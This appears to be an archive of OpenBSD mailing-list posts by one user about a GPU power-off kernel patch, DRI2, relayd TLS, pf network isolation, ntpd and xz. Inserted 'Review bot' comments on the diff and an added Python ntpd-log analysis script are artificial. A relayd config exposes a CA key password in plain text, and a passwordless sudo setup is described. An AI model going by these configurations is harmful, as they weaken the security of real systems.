czyPoprawnieName = false; +if(aml_evalname(sc, node, "_OFF", 0, NULL, )){ +printf("evalname na GPU true\n"); +czyPoprawnieName = true; +aml_freevalue(); +} else { +
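Review bot: the first two GENERIC hunks (maxusers 100, NTFS commented out, `option HZ=300`, the commented-out `DEBUG`) are local kernel-config preferences that have nothing to do with powering off the GPU; drop them so the GENERIC part of the diff is only the `+nvdsbl* at pci?` line, otherwise anyone who applies the patch silently inherits a non-default HZ and loses NTFS support.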
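Review bot: in the `+nvdsbl* at pci?` hunk the comment `# Nvidia PCI Driver for disabling` does not say what it matches; the neighbouring entries name the hardware, so something like `# NVIDIA 10de:1140 power-off stub` fits the file. That line is only half of the wiring: files.pci also needs `device nvdsbl`, `attach nvdsbl at pci` and `file dev/pci/nvdsbl.c nvdsbl`, and the status list shows files.pci as modified but the quoted diff never reaches it.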
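Review bot: in the first acpi.c hunk, `res2` and `val2` are added to the function-wide declarations, but nothing in the quoted diff uses `val2`, and `res2` is only needed by the `_OFF` block; declare them inside that block (and drop `val2` if the cut-off part does not use it) so the rest of acpi_getpci() is untouched.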
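Review bot: the success test in the `_OFF` block is inverted: aml_evalname() returns 0 when the method was evaluated and non-zero on failure, so `if(aml_evalname(sc, node, "_OFF", 0, NULL, ...))` enters the `evalname na GPU true` branch and calls aml_freevalue() exactly when the call failed; test for `== 0` instead. As quoted, the last argument of both aml_evalname() and aml_freevalue() is also missing (`NULL, )` and `aml_freevalue()`), which looks like an argument lost in transit; resend the diff as an attachment. Matching on the hard-coded `\\_SB_.PCI0.PEG0.PEGP` name is fragile across laptops, as the cover text admits: this function already has the node's PCI bus/dev/fun and a `pc`/`tag` pair, so reading PCI_ID_REG and checking for the 10de:1140 vendor/device would tie the `_OFF` call to the actual GPU. The Polish debugging printfs (`bedzie evalname na GPU`) and the `czyNvidiaGPU`/`czyPoprawnieName` names should go before this is posted for wider testing, as should the `if(`/`){` spacing, which KNF writes as `if (` and `) {`.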
Re: graphics acceleration, DRI2, DRM problem
I trimmed the lspci output, but actually it was important. I have not only an Intel GPU but also an Nvidia GPU. A year ago I wrote an ugly hack to disable the Nvidia GPU for power saving. I am sure that it is too ugly to commit to the repository, and I am not a programming professional, so I need a lot of time to write even an ugly and tiny patch.

Actually DRI2 works if I recompile the kernel with my patch. The following is printed by mpv with working graphics acceleration:

$ EGL_LOG_LEVEL=debug LIBGL_DEBUG=verbose MESA_DEBUG=1 mpv movie.avi
Playing: movie.avi
 (+) Video --vid=1 (mpeg4)
 (+) Audio --aid=1 (ac3)
 (+) Subs  --sid=1 'movie.srt' (subrip) (external)
libGL: OpenDriver: trying /usr/X11R6/lib/modules/dri/i965_dri.so
libGL: Using DRI2 for screen 0
libEGL debug: Native platform type: x11 (autodetected)
libEGL debug: added egl_dri2 to module array
libEGL debug: DRI2: dlopen(/usr/X11R6/lib/modules/dri/i965_dri.so)
libEGL debug: found extension `DRI_Core'
libEGL info: found extension DRI_Core version 1
libEGL debug: found extension `DRI_IMAGE_DRIVER'
libEGL debug: found extension `DRI_DRI2'
libEGL info: found extension DRI_DRI2 version 4
libEGL debug: found extension `DRI_DriverVtable'
libEGL debug: found extension `DRI_ConfigOptions'
libEGL debug: found extension `DRI_TexBuffer'
libEGL info: found extension DRI_TexBuffer version 3
libEGL debug: found extension `DRI2_Fence'
libEGL debug: found extension `DRI2_Flush'
libEGL info: found extension DRI2_Flush version 4
libEGL debug: found extension `DRI_IMAGE'
libEGL info: found extension DRI_IMAGE version 11
libEGL debug: found extension `DRI_RENDERER_QUERY'
libEGL debug: found extension `DRI_CONFIG_QUERY'
libEGL debug: found extension `DRI_Robustness'
libEGL info: Using DRI2
libEGL debug: the best driver is DRI2
[ffmpeg/audio] ac3: Channel layout '5.1(side)' with 6 channels does not match specified number of channels 2: ignoring specified channel layout
AO: [sdl] 48000Hz stereo 2ch s32
VO: [opengl] 720x304 yuv420p
AV: 00:29:00 / 02:14:49 (21%) A-V:  0.000 Cache:  0s+1MB
[ffmpeg/audio] ac3: frame sync error
Error decoding audio.
AV: 00:41:39 / 02:14:49 (30%) A-V:  0.000 Cache:  0s+8MB
[ffmpeg/audio] ac3: frame sync error
Error decoding audio.
AV: 00:41:42 / 02:14:49 (30%) A-V:  0.000 Cache:  9s+8MB

Exiting... (Quit)
pthread_mutex_destroy on mutex with waiters!
libEGL debug: Display 0x1728778c8800 is destroyed with resources
graphics acceleration, DRI2, DRM problem
Hello

I have:

$ sysctl kern.version
kern.version=OpenBSD 6.0-current (GENERIC.MP) #2353: Sat Aug 13 11:34:33 MDT 2016
    dera...@amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/GENERIC.MP

# sysctl hw.model
hw.model=Intel(R) Pentium(R) CPU B960 @ 2.20GHz

# lspci -nn | grep VGA
00:02.0 VGA compatible controller [0300]: Intel Corporation 2nd Generation Core Processor Family Integrated Graphics Controller [8086:0106] (rev 09)

It is a Sandy Bridge CPU and the GPU is HD 2000. I used to watch movies on OpenBSD, but now (since a few days and some upgrades) I have problems with the performance of multimedia/mpv. I suspect a software problem with DRI2. Infos about Audio/Video desynchronisation were always present, but they didn't disturb or prevent watching movies.

    libEGL warning: DRI2: failed to authenticate

happened in the past too, so I needed to upgrade packages and base to solve the problem back then. Now it unfortunately didn't help. I chown-ed the drm files:

# chown open /dev/drm[0-3]
#

But it didn't help.

Part of Xorg.0.log:

[  3005.601] (II) intel(0): SNA initialized with Sandybridge (gen6, gt1) backend
[  3005.601] (==) intel(0): Backing store enabled
[  3005.601] (==) intel(0): Silken mouse disabled
[  3005.601] (II) intel(0): HW Cursor enabled
[  3005.601] (II) intel(0): RandR 1.2 enabled, ignore the following RandR disabled message.
[  3005.601] (==) intel(0): DPMS enabled
[  3005.602] (WW) intel(0): [DRI2] Direct rendering is not supported when VGA arb is necessary for the device
[  3005.602] (II) intel(0): hardware support for Present enabled
[  3005.602] (--) RandR disabled
[  3005.602] (II) Found 2 VGA devices: arbiter wrapping enabled
[  3005.620] (II) AIGLX: Screen 0 is not DRI2 capable
[  3005.620] (EE) AIGLX: reverting to software rendering
[  3005.631] (II) AIGLX: enabled GLX_MESA_copy_sub_buffer
[  3005.632] (II) AIGLX: Loaded and initialized swrast
[  3005.632] (II) GLX: Initialized DRISWRAST GL provider for screen 0

What mpv is printing:

$ EGL_LOG_LEVEL=debug LIBGL_DEBUG=verbose MESA_DEBUG=1 mpv movie.avi
Playing: movie.avi
 (+) Video --vid=1 (mpeg4)
 (+) Audio --aid=1 (ac3)
 (+) Subs  --sid=1 'movie.srt' (subrip) (external)
libGL: screen 0 does not appear to be DRI2 capable
libGL: OpenDriver: trying /usr/X11R6/lib/modules/dri/swrast_dri.so
libEGL debug: Native platform type: x11 (autodetected)
libEGL debug: added egl_dri2 to module array
libEGL warning: DRI2: failed to authenticate
libEGL debug: DRI2: dlopen(/usr/X11R6/lib/modules/dri/swrast_dri.so)
libEGL debug: found extension `DRI_Core'
libEGL info: found extension DRI_Core version 1
libEGL debug: found extension `DRI_SWRast'
libEGL info: found extension DRI_SWRast version 4
libEGL debug: found extension `DRI_CopySubBuffer'
libEGL debug: found extension `DRI_ConfigOptions'
libEGL debug: found extension `DRI_TexBuffer'
libEGL info: found extension DRI_TexBuffer version 2
libEGL debug: found extension `DRI_RENDERER_QUERY'
libEGL debug: found extension `DRI_CONFIG_QUERY'
libEGL debug: the best driver is DRI2
[ffmpeg/audio] ac3: Channel layout '5.1(side)' with 6 channels does not match specified number of channels 2: ignoring specified channel layout
AO: [sdl] 48000Hz stereo 2ch s32
VO: [opengl] 720x304 yuv420p
AV: 00:00:00 / 02:14:49 (0%) A-V:  0.211 Cache:  9s+16MB

Audio/Video desynchronisation detected! Possible reasons include too slow
hardware, temporary CPU spikes, broken drivers, and broken files. Audio
position will not match to the video (see A-V status field).

AV: 00:00:08 / 02:14:49 (0%) A-V:  0.000 Dropped: 176 Cache:  9s+16MB

Exiting... (Quit)
pthread_mutex_destroy on mutex with waiters!
libEGL debug: Display 0x34f55a7000 is destroyed with resources
$

$ cat /var/log/Xorg.0.log
[  3005.453] (--) checkDevMem: using aperture driver /dev/xf86
[  3005.465] (--) Using wscons driver on /dev/ttyC4
[  3005.484]
X.Org X Server 1.18.4
Release Date: 2016-07-19
[  3005.484] X Protocol Version 11, Revision 0
[  3005.484] Build Operating System: OpenBSD 6.0 amd64
[  3005.484] Current Operating System: OpenBSD r2d2 6.0 GENERIC.MP#2353 amd64
[  3005.485] Build Date: 13 August 2016  11:57:16AM
[  3005.485]
[  3005.485] Current version of pixman: 0.32.8
[  3005.485]    Before reporting problems, check http://wiki.x.org
    to make sure that you have the latest version.
[  3005.485] Markers: (--) probed, (**) from config file, (==) default setting,
    (++) from command line, (!!) notice, (II) informational,
    (WW) warning, (EE) error, (NI) not implemented, (??) unknown.
[  3005.485] (==) Log file: "/var/log/Xorg.0.log", Time: Sun Aug 14 12:12:48 2016
[  3005.485] (==) Using config directory: "/etc/X11/xorg.conf.d"
[  3005.486] (==) Using system config directory "/usr/X11R6/share/X11/xorg.conf.d"
[  3005.486] (==) No Layout section.  Using the first Screen section.
[  3005.486] (==) No screen section available. Using defaults.
[  3005.486] (**) |-->Screen "Default Screen Section" (0)
[  3005.486] (**) |   |-->Monitor "<default monitor>"
[  3005.486] (==) No
Re: /usr/ and wxallowed
I have upgraded the base system. I am going to update ports when the mirror is in sync with the main one. wxallowed on /usr works as expected:

$ mount | grep /usr
/dev/sd2e on /usr type ffs (local, noatime, nodev, wxallowed, softdep)
$ grep wxallowed /etc/fstab
e2687744d2198a2e.e /usr ffs rw,wxallowed,nodev,softdep,noatime 1 2

Besides that I can add that Firefox works with the W^X restriction and Chromium does not. wxallowed lets me use Chromium successfully.
/usr/ and wxallowed
Hello, I have a non-standard partitioned OpenBSD-current installation dated before 05/27. I don't have a separate filesystem/disklabel partition for /usr/local/. I have /usr/ on a separate ffs filesystem. Can I add wxallowed to the /usr/ filesystem or must I repartition/reinstall OpenBSD?
Breakthrough in distributed rngs
Theoretical breakthrough in distributed random number generation. David Zuckerman, a computer science professor, and Eshan Chattopadhyay, a graduate student, published a paper in March that will be presented in June at the Symposium on Theory of Computing.

“We show that if you have two low-quality random sources—lower quality sources are much easier to come by—two sources that are independent and have no correlations between them, you can combine them in a way to produce a high-quality random number,”

https://threatpost.com/academics-make-theoretical-breakthrough-in-random-number-generation/118150/
http://eccc.hpi-web.de/report/2015/119/
Re: mfs vs tmpfs: advantages and disadvantages
And what about performance? Is tmpfs or mfs faster? Is one or the other more resource hungry?
--
Furthermore, I consider that systemd must be destroyed
Latin oratorical phrase
today amd64 snapshot libpthread segfault
What exactly is the version of the base system?
$ sysctl kern.version
Have you also updated packages/ports? On http://www.openbsd.org/faq/current.html there is info about a recent ABI break.
Re: Mail : MRA MDA LDA e-mail processors in OpenBSD
>I don't know what "MRA" means, but for fetching:

According to Wikipedia's "Email agent" there are:
Mail user agent (MUA)
Mail submission agent (MSA)
Mail access agent (MAA)
Mail transfer agent (MTA)
Mail delivery agent (MDA)
Mail retrieval agent (MRA)
Mail : MRA MDA LDA e-mail processors in OpenBSD
Hello, I am a casual OpenBSD user. I use it on a laptop. I don't have servers and do *not* want to create my own mail service. I use what the crowd uses: I have Yahoo, Gmail, Yandex mail accounts. I would like to use mutt and shell scripts for mail notification etc. To accomplish this I want to have a local copy of mail in Maildir format. What MRA do you use for that? Getmail, fetchmail or something else? Is there something in OpenBSD's base for that? I would also like to do some things with mail, for example get rid of attachments for mail in one account and do the reverse, the opposite, on the other account: just backup attachments, saving them in normal files with appropriate extensions in the file names, not inside other Maildir messages. To accomplish this I think, but I am not sure, I need an MDA such as procmail or maildrop or something similar. What do you use? I want something quite secure and not much complicated. It does *not* need to be feature rich. Bonus points for software in OpenBSD's base.
Re: Relayd TLS client mode CA verification
I have reported the problem to the bugs mailing list. Thanks for checking that and for the response.
Re: Relayd TLS client mode CA verification
When it works fine, but without certificate verification:

$ cat /etc/relayd.conf
tcp protocol proto_wp {
#tls ca file "/etc/ssl/cert.pem"
tls tlsv1.1
pass
}
relay connect_to_mail_wp {
protocol proto_wp
listen on 127.0.0.1 port
forward with tls to imap.wp.pl port 993
}

# relayd -d -vvv -f /etc/relayd.conf
startup
socket_rlimit: max open files 1024
socket_rlimit: max open files 1024
socket_rlimit: max open files 1024
relay_privinit: adding relay connect_to_mail_wp
protocol 1: name proto_wp
flags: used, relay flags: tls client
tls flags: tlsv1.1, tlsv1.2, cipher-server-preference, client-renegotiation
type: tcp
pass request
ca_engine_init: using RSA privsep engine
socket_rlimit: max open files 1024
ca_engine_init: using RSA privsep engine
ca_engine_init: using RSA privsep engine
ca_engine_init: using RSA privsep engine
relay_launch: running relay connect_to_mail_wp
relay_launch: running relay connect_to_mail_wp
relay_launch: running relay connect_to_mail_wp
relay connect_to_mail_wp, tls session 1 connected (1 active)
relay connect_to_mail_wp, session 1 (1 active), 0, 127.0.0.1 -> 212.77.101.140:993, done

***

When it fails:

$ cat /etc/relayd.conf
tcp protocol proto_wp {
tls ca file "/etc/ssl/cert.pem"
tls tlsv1.1
pass
}
relay connect_to_mail_wp {
protocol proto_wp
listen on 127.0.0.1 port
forward with tls to imap.wp.pl port 993
}

# relayd -d -vvv -f /etc/relayd.conf
startup
socket_rlimit: max open files 1024
relay_load_certfiles: using ca /etc/ssl/cert.pem
socket_rlimit: max open files 1024
socket_rlimit: max open files 1024
socket_rlimit: max open files 1024
relay_privinit: adding relay connect_to_mail_wp
protocol 1: name proto_wp
flags: used, relay flags: tls client
tls flags: tlsv1.1, tlsv1.2, cipher-server-preference, client-renegotiation
type: tcp
pass request
ca_engine_init: using RSA privsep engine
ca_engine_init: using RSA privsep engine
ca_engine_init: using RSA privsep engine
ca_engine_init: using RSA privsep engine
Re: Relayd TLS client mode CA verification
Maybe I will post an example of what I am doing. OpenBSD-current amd64 March 16th, 2016. Getmail and imap over TLS.

$ cat /etc/relayd.conf
tcp protocol proto_wp {
tls ca file "/etc/ssl/cert.pem"
pass
}
relay connect_to_mail_wp {
protocol proto_wp
listen on 127.0.0.1 port
forward with tls to imap.wp.pl port 993
}

$ cat getmailrc
[retriever]
type = SimpleIMAPRetriever
server = 127.0.0.1
port =
username = censored
password = censored
[destination]
type = Maildir
path = censored
[options]
delete = false
message_log = censored

If you do:
openssl s_client -connect imap.wp.pl:993 -CAfile /etc/ssl/cert.pem
you will see that TLS is supported. I can also confirm that removing the line with tls ca file allows me to connect successfully to imap over TLS using relayd. But I want verification of the certificate... Am I doing something wrong or is this a bug in relayd?
Relayd TLS client mode CA verification
Hello, OpenBSD current amd64 march 16 snapshot. I am using relayd as a client for encrypted https connections. I would like to make relayd verify the CA. Now I have, without verification:

web browser encrypted stream -> 1 relayd in server mode -> unencrypted stream -> privoxy and divert using pf -> 2 relayd in client mode -> change destination port using pf -> Internet

And it works! I only need to force verification of the CA for certificates on 2 relayd, because as far as I understand relayd does not do this by default. The problem is that if I add:
tls ca file "/etc/ssl/cert.pem"
to the http protocol, the web browser is not able to reach the TLS website. The web browser does not show an error, but loads and loads and loads the web page, without showing the webpage.
Why this pf rule is not enough?
I have rdomain 1 and the default rdomain.
pair1 is in rdomain 1
pair2 is in the default rdomain
Inside rdomain1 there is no loopback interface; the network is 172.10.0.2/24.
In /etc/resolv.conf I have nameserver 127.0.0.1 so all DNS (UDP 53) packets should go to 127.0.0.1.
The default route in rdomain1 is the pair2 interface (172.10.0.2).
I want (and achieved) intercepting DNS requests from rdomain1 to 172.10.0.2 port 9053. I have the rule:

pass out quick log (all, to pflog0) on pair1 inet proto udp to 127.0.0.1 port 53 rdr-to 172.10.0.2 port 9053 keep state (floating)

but it is not enough. I needed to add this rule:

pass in quick on pair2 inet proto udp from pair1 to any port 53 rdr-to pair2 port 9053 keep state (floating)
Re: What are the disadvantages of soft updates?
Hello

Given that one could change options for a filesystem such as sync to async without remounting using
mount -u -o options /what /where
is it possible to disable softdep on the fly (without unmounting)?

Second question: Is mounting an fs with the softdep *and* sync options secure? For example now I have:

mount | grep usr
/dev/sd1e on /usr type ffs (local, nodev, synchronous, softdep)

and could have this:

mount | grep usr
/dev/sd1e on /usr type ffs (local, softdep)
Re: Firefox W^X isn't a part of Pwn2Own contest
About X.Org isolation I have heard of Xpra - "screen for X11" but haven't used this yet.
Re: bug in pair ?
What do you see in ifconfig? I have a line like that:

ifconfig pair1
pair1: flags=8843rdomain 1 mtu 1500

and the content of the config file for the interface:

cat /etc/hostname.pair1
inet 172.10.0.1 255.255.255.0 172.10.0.255 rdomain 1

and probably less importantly:

sysctl net.inet.ip.forwarding net.inet6.ip6.forwarding
Softraid crypto header key backup
Hello, I am using OpenBSD amd64 with FDE. I wonder if there is a possibility of making a backup of the header/key used by softraid crypto, like in the LUKS/dm-crypt solution for Gnu/Linux? I know that backup is relevant and I do backups, but if there is a possibility to add one more additional easy step to be more confident about data survival/recovery, I would certainly do this.
Re: Firefox W^X isn't a part of Pwn2Own contest
> Do you also sandbox the browser with some sort of remote desktop, or run under a separate X session? AFAIK X allows any program to meddle with any other program under the same display.

No, I don't. Setup is easy. In the easiest scenario just create a user, add to /etc/sudoers a line which lets you run Firefox as another user without the need for a password, create a one line script to use sudo and just refer to that script if you want to execute Firefox. I think there was also posted on the mailing list a small C program to change the UID and GID of the Firefox process, and you also probably can use doas from base, but I still use sudo.
Firefox W^X isn't a part of Pwn2Own contest
Does original Firefox compiled by Mozilla running on Windows have W^X? I bet: no, it doesn't. I run browsers on the other user account in OpenBSD.
Re: Network isolation of process using rdomain rtable
It seems it is starting to work.

Server command:
/usr/local/bin/sudo -u user /usr/bin/nc -4 -k -l 172.10.0.2 9191

Commands for programs I would like to intercept/redirect:

#!/bin/sh
/usr/local/bin/sudo /sbin/route -T1 exec /usr/local/bin/sudo \
 -u user /usr/bin/nc -4 -n -v 172.10.0.2 9191

random port
#!/bin/sh
/usr/local/bin/sudo /sbin/route -T1 exec /usr/local/bin/sudo \
 -u user /usr/bin/nc -4 -n -v 172.10.0.2 9192

random IP and port (this is Google, don't hack)
#!/bin/sh
/usr/local/bin/sudo /sbin/route -T1 exec /usr/local/bin/sudo \
 -u user /usr/bin/nc -4 -n -v 212.191.227.88 80

#cat pf.conf:
pass in quick on pair2 inet proto tcp from pair1 \
 rdr-to pair2 port 9191 keep state (floating)
pass in
pass out

#pfctl -sr
pass in quick on pair2 inet proto tcp from 172.10.0.1 \
 to any flags S/SA tag rdr_tor_tcp rdr-to 172.10.0.2 port 9191
pass in all flags S/SA
pass out all flags S/SA

Should I also do nat-to (source nat like in nftables) or maybe it is not necessary? Is there any possibility of packet leaks? I mean that these pf rules/this ruleset will not match some packet and the packet could go to the Internet instead of the local socket? I would like to prevent that. I am better off not sending a packet anywhere than sending it to the Internet.
Network isolation of process using rdomain rtable
Hello,

OpenBSD current amd64

I would like to isolate an application from the network and also to make sure that every packet goes to a certain port at a certain IP address. On Linux I achieved that using a network namespace, veth, iptables (destination nat) or nftables (dnat and snat). So far I have a pair of pair devices:

cat /etc/hostname.pair*
inet 172.10.0.1 255.255.255.0 172.10.0.255 rdomain 1 \
 description "An isolated Ethernet"
inet 172.10.0.2 255.255.255.0 172.10.0.255

patched together:
ifconfig pair1 patch pair2

with default route:
route -T1 add default 172.10.0.2

Commands for programs:

Server
/usr/local/bin/sudo -u user /usr/bin/nc -4 -k -l 172.10.0.2 9191

Commands for programs I would like to intercept/redirect:

Client 1 (port is the same):
/usr/local/bin/sudo /sbin/route -T1 exec /usr/local/bin/sudo \
 -u user /usr/bin/nc -4 -v 172.10.0.2 9191

Client 2 (port must be also redirected):
/usr/local/bin/sudo /sbin/route -T1 exec /usr/local/bin/sudo \
 -u user /usr/bin/nc -4 -v 172.10.0.2 9192

I struggle with pf rules. Now I have something like that, but probably wrong:

pass out quick on pair1 inet proto tcp from 172.10.0.1 \
 rdr-to 172.10.0.2 port 9040 keep state (floating)
pass out quick on pair1 inet proto udp from 172.10.0.1 \
 rdr-to 172.10.0.2 port 9053 keep state (floating)
pass in quick log (all, to pflog0) on pair2 inet proto tcp \
 to 172.10.0.2 nat-to pair1
pass in quick log (all, to pflog0) on pair2 inet proto udp \
 to 172.10.0.2 nat-to pair1
pass in
pass out
pass out on {pair1,pair2}
pass in on {pair1,pair2}

I have tried with various other pf rules and the rtable option, but none of that has worked. Do I need rdr-to and nat-to (like in nftables) or could I just use rdr-to (like in iptables)? What pf rules should I use?
Ntpd's confusing log messages
It is probably just aesthetics. When I have the clock not synchronized and it differs by a few seconds, I have the following output:

grep ntpd /var/log/daemon | tail -n 30
Feb 6 17:57:00 host ntpd[7585]: constraint reply from ip: offset 8.928573
Feb 6 17:57:19 host ntpd[7585]: peer 158.75.5.245 now valid
Feb 6 17:57:23 host ntpd[7585]: peer 194.29.130.252 now valid
Feb 6 17:57:25 host ntpd[7585]: peer 150.254.183.15 now valid
Feb 6 17:58:17 host ntpd[9279]: adjusting local clock by 9.096751s
Feb 6 18:02:02 host ntpd[9279]: adjusting local clock by 7.971861s
Feb 6 18:05:50 host ntpd[9279]: adjusting local clock by 6.838999s
Feb 6 18:07:26 host ntpd[9279]: adjusting local clock by 6.363730s
Feb 6 18:07:59 host ntpd[9279]: adjusting local clock by 6.196142s
Feb 6 18:11:11 host ntpd[9279]: adjusting local clock by 5.246003s
Feb 6 18:13:18 host ntpd[9279]: adjusting local clock by 4.615421s
Feb 6 18:14:55 host ntpd[9279]: adjusting local clock by 4.133148s
Feb 6 18:15:43 host ntpd[7585]: peer 150.254.183.15 now invalid
Feb 6 18:15:44 host ntpd[9279]: adjusting local clock by 3.892080s
Feb 6 18:20:04 host ntpd[9279]: adjusting local clock by 2.597929s
Feb 6 18:21:02 host ntpd[7585]: peer 150.254.183.15 now valid
Feb 6 18:24:19 host ntpd[9279]: adjusting local clock by 1.321471s
Feb 6 18:24:51 host ntpd[9279]: adjusting local clock by 1.161470s
Feb 6 18:29:06 host ntpd[7585]: clock is now synced

I don't think that the clock is adjusted "by" those values. If that were the case, I guess the clock would be synced far faster.
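As an added example that is not part of the original post, this Python script parses the ntpd lines quoted above and measures how fast the logged offset shrinks between consecutive messages, which tells whether the logged value is the remaining offset being slewed away at a steady rate; the year 2016 is an assumption needed only to build timestamps.

```python
import re
import statistics
from datetime import datetime

# Constructed input: the ntpd lines quoted in the post above. The year is an
# assumption (only needed to build datetimes; it does not affect the deltas).
NTPD_LOG = """\
Feb 6 17:57:00 host ntpd[7585]: constraint reply from ip: offset 8.928573
Feb 6 17:57:19 host ntpd[7585]: peer 158.75.5.245 now valid
Feb 6 17:57:23 host ntpd[7585]: peer 194.29.130.252 now valid
Feb 6 17:57:25 host ntpd[7585]: peer 150.254.183.15 now valid
Feb 6 17:58:17 host ntpd[9279]: adjusting local clock by 9.096751s
Feb 6 18:02:02 host ntpd[9279]: adjusting local clock by 7.971861s
Feb 6 18:05:50 host ntpd[9279]: adjusting local clock by 6.838999s
Feb 6 18:07:26 host ntpd[9279]: adjusting local clock by 6.363730s
Feb 6 18:07:59 host ntpd[9279]: adjusting local clock by 6.196142s
Feb 6 18:11:11 host ntpd[9279]: adjusting local clock by 5.246003s
Feb 6 18:13:18 host ntpd[9279]: adjusting local clock by 4.615421s
Feb 6 18:14:55 host ntpd[9279]: adjusting local clock by 4.133148s
Feb 6 18:15:43 host ntpd[7585]: peer 150.254.183.15 now invalid
Feb 6 18:15:44 host ntpd[9279]: adjusting local clock by 3.892080s
Feb 6 18:20:04 host ntpd[9279]: adjusting local clock by 2.597929s
Feb 6 18:21:02 host ntpd[7585]: peer 150.254.183.15 now valid
Feb 6 18:24:19 host ntpd[9279]: adjusting local clock by 1.321471s
Feb 6 18:24:51 host ntpd[9279]: adjusting local clock by 1.161470s
Feb 6 18:29:06 host ntpd[7585]: clock is now synced
"""
LOG_YEAR = 2016

# syslog prefix: "Mon  d HH:MM:SS host ntpd[pid]: message"
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ ntpd\[\d+\]: (?P<msg>.*)$"
)
ADJ_RE = re.compile(r"adjusting local clock by (?P<off>-?\d+\.\d+)s")


def parse_ntpd_log(text, year=LOG_YEAR):
    """Return a list of (timestamp, message) for every ntpd syslog line."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        entries.append((ts, m["msg"]))
    return entries


def logged_offsets(entries):
    """Keep only the 'adjusting local clock by X' lines as (timestamp, X)."""
    result = []
    for ts, msg in entries:
        m = ADJ_RE.search(msg)
        if m:
            result.append((ts, float(m["off"])))
    return result


def slew_rates(offsets):
    """Seconds of logged offset that disappear per wall-clock second between
    consecutive messages. If ntpd logged the amount it had just applied these
    numbers would be scattered; if it logs the offset still left to remove,
    they show the steady rate at which the kernel slews the clock."""
    rates = []
    for (t0, o0), (t1, o1) in zip(offsets, offsets[1:]):
        dt = (t1 - t0).total_seconds()
        if dt > 0:
            rates.append((o0 - o1) / dt)
    return rates


def analyze(text):
    entries = parse_ntpd_log(text)
    offsets = logged_offsets(entries)
    rates = slew_rates(offsets)
    median = statistics.median(rates)
    first_ts, first_off = offsets[0]
    synced_ts = next(ts for ts, msg in entries if msg == "clock is now synced")
    return {
        "samples": len(rates),
        "median_rate": median,  # seconds of offset removed per second
        "min_rate": min(rates),
        "max_rate": max(rates),
        # time the first offset needs to vanish at the median rate, next to
        # the time until ntpd actually reported "clock is now synced"
        "predicted_sync_s": first_off / median,
        "observed_sync_s": (synced_ts - first_ts).total_seconds(),
    }


if __name__ == "__main__":
    r = analyze(NTPD_LOG)
    print(f"{r['samples']} intervals: offset shrinks by "
          f"{r['median_rate'] * 1000:.2f} ms per second "
          f"(min {r['min_rate'] * 1000:.2f}, max {r['max_rate'] * 1000:.2f})")
    print(f"9.096751 s at that rate needs {r['predicted_sync_s']:.0f} s; "
          f"'clock is now synced' came after {r['observed_sync_s']:.0f} s")
```

The offsets fall by a near-constant 5 ms per wall-clock second and the first offset divided by that rate lands within about 20 s of the "clock is now synced" message, so the logged value is the offset still to be removed, not an amount applied at that moment.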
Re: xz: (stdin): Cannot allocate memory
I figured out that my default is:

ulimit -d
1572864
echo "1572864/1024" | bc
1536

The value which lets me compress using this setting is between 1682864 and 1672864 kilobytes. I have also discovered the command line option for xz --memlimit=
Now my command looks like this:

cat archive.tar | xz -zf --memlimit=1600MiB \
 --format=xz -9e --threads=2 - > archive.tar.xz

but I get:

xz: Adjusted the number of threads from 2 to 1 to not exceed the memory usage limit of 1600 MiB

1600 is clearly larger than 674*2=1348. In the end I can compress, but I think that something is wrong.

From: "Christian Weisgerber" <na...@mips.inka.de>
To: "Lampshade" <lampsh...@poczta.fm>;
Sent: 16:25 Saturday 2016-01-30
Subject: Re: xz: (stdin): Cannot allocate memory

> Lampshade:
>
> > I have following error:
> > cat archive.tar | xz -zf --format=xz -9e --threads=2 - > archive.tar.xz
> > xz: (stdin): Cannot allocate memory
>
> You are using the most extreme compression setting, which requires
> about 674 MB per thread according to the xz(1) man page. This
> causes you to bump against the data size limit (ulimit -d, see
> ksh(1)).
>
> You need to raise the limit or use a less greedy compression setting.
>
> --
> Christian "naddy" Weisgerber na...@mips.inka.de
Re: xz: (stdin): Cannot allocate memory
This xz command worked in the past so I think something must have changed in the past. Indeed, this command worked when I had 4G of DDR3@1333Mhz RAM. Now I have 6GB DDR3 on the same laptop so I have even more. I will look at ulimit -d this evening. I didn't change them manually, so they must have been changed during the upgrade from current to current.
xz: (stdin): Cannot allocate memory
Hello

I have this OS with packages as of yesterday (Jan 29):
kern.version=OpenBSD 5.9-beta (GENERIC.MP) #1865: Thu Jan 28 20:18:15 MST 2016
 dera...@amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/GENERIC.MP

and also tested with packages around Jan 17:
kern.version=OpenBSD 5.9-beta (GENERIC.MP) #1846: Sun Jan 17 02:34:54 MST 2016
 dera...@amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/GENERIC.MP

I have the following error:

cat archive.tar | xz -zf --format=xz -9e --threads=2 - > archive.tar.xz
xz: (stdin): Cannot allocate memory
codepage and iocharset in fat32 aka msdos filesystem
Hello,

I am from Poland. I am using Windows 8.1 64-bit and OpenBSD-current amd64. When I used Gnu/Linux I mounted fat32 partitions with these options:
iocharset=iso8859-2,codepage=852

However OpenBSD's mount tells me:

mount -t msdos -o codepage=852 /dev/sd0f /mnt/partycjaFat/
mount_msdos: -o codepage: option not supported

and

mount -t msdos -o iocharset=iso8859-2 /dev/sd0f /mnt/partycjaFat/
mount_msdos: -o iocharset: option not supported

1. What codepage is used by default in a FAT32 filesystem created and mounted in OpenBSD?
2. Is there a way to use another codepage in OpenBSD?
If the answer to 2 is no, then:
3. Is there a way to force Windows to use a different codepage for that FAT32 partition?
Re: Relayd as a HTTPS client
I have posted this message also to bugs mailing lists with subject Relayd in TlsClient mode accepts TLSv1 and TLSv1.1 today, January 10, 2016
Relayd as a HTTPS client
Hi,

I am using the following configuration to connect to TLS websites:

Chromium <-> relayd as a server <-> privoxy <-> relayd as a client <-> hostile Internet

I want to focus on relayd as a client in this mailing list thread. I want to instruct relayd as a client to only connect using TLS versions 1.1 and 1.2 to servers. I don't want TLS version 1.0 and SSL version 3.0. Here is the, I hope relevant, part of my config /etc/relayd.conf:

http protocol certKlient {
tls no cipher-server-preference
tls no tlsv1.0
tls tlsv1.1
tls tlsv1.2
tls ca key "/etc/ssl/private/ca.key" password "domek"
# i will change that in a future
# i don't use that config to my bank account and other relevant websites
tls ca cert "/etc/ssl/ca.crt"
